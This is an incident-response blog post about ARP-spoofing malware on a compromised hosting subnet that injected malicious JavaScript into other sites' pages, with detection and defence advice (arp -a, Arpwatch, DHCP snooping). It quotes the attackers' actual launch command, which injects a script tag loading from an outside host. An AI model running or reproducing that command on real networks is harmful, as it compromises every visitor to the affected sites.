Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet.

So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets. ARP spoofing attacks are nothing new – they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary.

The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying.

This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).

The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script:

svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2

svchost.exe’s options are self explanatory – it uses the interface 0 (idx) and spoofs the IP address in the ip option. Finally it inserts whatever is in the insert option into every HTML page served.

Nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp –a on both Windows and Linux) – one should watch out for weird MAC addresses. It usually pays to check the OID owner because you don’t see Dell routers all that often as shown in the following Wireshark screenshot of ARP poisoning traffic:



There are various ways for defending against ARP spoofing. One can hard code MAC addresses of routers on servers (be careful with this as changes to the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installation of Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal network.

Regarding other malware I mentioned previously, the AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked how simple modifications made it “invisible” to those AV programs.

--
Bojan
INFIGO IS